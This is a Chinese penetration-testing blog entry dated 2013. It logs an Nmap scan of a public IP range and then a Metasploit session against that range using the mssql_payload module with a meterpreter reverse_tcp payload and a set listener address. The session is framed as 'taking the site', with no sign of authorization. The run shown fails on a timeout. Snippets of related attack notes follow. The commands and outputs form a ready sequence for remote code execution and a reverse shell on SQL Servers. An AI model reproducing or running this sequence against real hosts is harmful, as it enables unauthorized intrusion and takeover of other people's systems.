渗透杂记-2013-07-13 windows/mssql/mssql_payload

扫描一下
Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间
NSE: Loaded 49 scripts for scanning.
Initiating Ping Scan at 09:36
Scanning 203.171.239.* [4 ports]
Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 09:36
Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed
Initiating SYN Stealth Scan at 09:36
Scanning 203.171.239.* [1000 ports]
Discovered open port 3389/tcp on 203.171.239.*
Discovered open port 80/tcp on 203.171.239.*
Discovered open port 3306/tcp on 203.171.239.*
Discovered open port 21/tcp on 203.171.239.*
Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)
Initiating Service scan at 09:36
Scanning 4 services on 203.171.239.*
Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 203.171.239.*
Retrying OS detection (try #2) against 203.171.239.*
Initiating Traceroute at 09:37
Completed Traceroute at 09:37, 0.06s elapsed
Initiating Parallel DNS resolution of 1 host. at 09:37
Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed
NSE: Script scanning 203.171.239.*.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 09:37
Completed NSE at 09:37, 5.22s elapsed
NSE: Script Scanning completed.
Nmap scan report for 203.171.239.*
Host is up (0.043s latency).
Not shown: 994 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
25/tcp closed smtp
80/tcp open http Microsoft IIS httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_html-title: Site doesn‘t have a title (text/html).
110/tcp closed pop3
3306/tcp open mysql MySQL 5.1.32-community
| mysql-info: Protocol: 10
| Version: 5.1.32-community
| Thread ID: 30457
| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection
| Status: Autocommit
|_Salt: <*[k+0O~O" target=_blank>[email protected]";By^J5k<*[k+0O~O
3389/tcp open microsoft-rdp Microsoft Terminal Service
Device type: general purpose|media device
Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)
Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Busy server or unknown class
Service Info: OS: Windows
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 50.00 ms 203.171.239.*
Read data files from: D:\metasploit\Nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds
Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)
开始拿站
Welcome to the Metasploit Web Console!
_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 296 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 296 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/mssql/mssql_payload
>> info windows/mssql/mssql_payload
Name: Microsoft SQL Server Payload Execution
Version: 9669
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Provided by:
David Kennedy "ReL1K" <kennedyd013@gmail.com>
jduck <jduck@metasploit.com>
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload information:
Description:
This module will execute an arbitrary payload on a Microsoft SQL
Server, using the Windows debug.com method for writing an executable
to disk and the xp_cmdshell stored procedure. File size restrictions
are avoided by incorporating the debug bypass method presented at
Defcon 17 by SecureState. Note that this module will leave a
metasploit payload in the Windows System32 directory which must be
manually deleted once the attack is completed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402
http://www.osvdb.org/557
http://www.securityfocus.com/bid/1281
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209
http://www.osvdb.org/15757
http://www.securityfocus.com/bid/4797
http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf
>> use windows/mssql/mssql_payload
>> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
>> show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
RHOST yes The target address
RPORT 1433 yes The target port
USERNAME sa no The username to authenticate as
UseCmdStager true no Wait for user input before returning from exploit
VERBOSE false no Enable verbose output
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh, thread, process
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
>> set RHOST 203.171.239.*
RHOST => 203.171.239.*
>> set LHOST 172.16.2.101
LHOST => 172.16.2.101
>> exploit
[*] Started reverse handler on 172.16.2.101:4444
[-] Exploit failed: The connection timed out (203.171.239.*:1433).
[*] Exploit completed, but no session was created.
时间: 2024-08-15 21:10:40

渗透杂记-2013-07-13 windows/mssql/mssql_payload的相关文章

张珺 2015/07/13 个人文档

姓名 张珺 日期 2015/07/13 主要工作及心得 今天主要和任笑萱一起完成了对客户端中提供者的调试以及数据库的修改工作. 通过今天的调试工作,我对整个项目有了更深入的认识,对于用java编写客户端服务器程序的流程有了更进一步的了解. 遇到的问题 在今天的工作中,我们发现了之前构建数据库时未考虑到的一些问题,也发现了之前完成的任务中存在的一些错误. 最开始时无法登陆,服务器端不返回消息.次问题结局后,提供者界面中主要的问题主要在于对会员.服务编号进行验证时出现的问题,例如返回的信息不满足预期

渗透杂记-2013-07-12

[email protected]:~# msfpro [*] Starting Metasploit Console... [-] WARNING! The following modules could not be loaded! [-] /opt/metasploit/apps/pro/msf3/modules/exploits/freebsd/local/mmap.rb: NameError uninitialized constant Msf::Post::Common Call t

9x25 LED 驱动框架分析 2016.07.13

进入内核 make menuconfig 输入 /led 回车搜索到 │ Location: │ │ -> Device Drivers │ │ -> LED Support (NEW_LEDS [=y]) 进入LED Support发现有这一项 []LED Support for GPIO connected LEDs 在内核搜索该字符串 grep "LED Support for GPIO connected LEDs" * -nR 搜索到 drivers/leds/K

渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | ( | | | _| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| _| =[ metasploit v3.4.2-dev [core:3.4 api:1.0] + -- --=[ 566 exploits - 283

小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧(包括参数.局部数据等),实现函数调用机制,它的数据增长方向是低地址方向.堆空间存储了程序运行时动态申请的内存数据等,数据增长方向是高地址方向.除了代码段和受操作系统保护的数据区域,其他的内存区域都可能作为缓冲区,因此缓冲区溢出的位置可能在数据段,也可能在堆.栈段.如果程序的代码有软件漏洞,恶意程序

[转载]SAP ERP 6.0 EHP7 SR2(WINDOWS MSSQL版)安装说明

原文 by 枫竹丹青 ⋅ 1.安装准备 1.1.版本说明 本文是描述在一个Windows虚拟机.SQL Server数据库环境下,安装SAP ERP 6.0 EHP7 SR2服务器,安装完成虚拟机文件尺寸约60G,可以很方便地转到笔记本的SSD硬盘中使用. SAP ERP 6.0 EHP7 SR2隶属于SAP Business Suite 7i 2013 Support Release 2商务套件,于2014年底发布,除ERP 6.0 EHP7 SP2外,还包括CRM 7.0 EHP3 SR2.

【渗透攻防】深入了解Windows

前言 本篇是基础教程,带大家了解Windows常用用户及用户组,本地提取用户密码,远程利用Hash登录到本地破解Hash.初步掌握Windows基础安全知识. 目录 第一节 初识Windows 第二节 Windows密码安全 第三节 利用Hash远程登录系统 正文 第一节 初识Windows 1.1.什么是Window Microsoft Windows,是美国微软公司研发的一套操作系统,它问世于1985年,起初仅仅是Microsoft-DOS模拟环境,后续的系统版本由于微软不断的更新升级,不但

渗透测试中如何提取Windows系统帐户密码

『面向对象』本篇博文主要面向信息安全渗透测试初级人员以及信息安全攻防技术爱好者,大牛请珍惜生命.自行绕道. 『主要内容』主要介绍在后渗透测试阶段如何利用工具来获取Windows操作系统账号密码. ---------------------------------------菜鸟起飞系列------------------------------------------------ 渗透测试任务:获取Windows系统帐户密码 攻击测试目标:Windows server2003 2008 2012

渗透杂记-2013-07-13 关于SMB版本的扫描

smb2的溢出,其实在metasploit里面有两个扫描器可以用,效果都差不多,只是一个判断的更加详细,一个只是粗略的判断. Welcome to the Metasploit Web Console! _ _ _ | | (_)_ ____ ____| |_ ____ ___ ____ | | ___ _| |_ | \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _) | | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__ |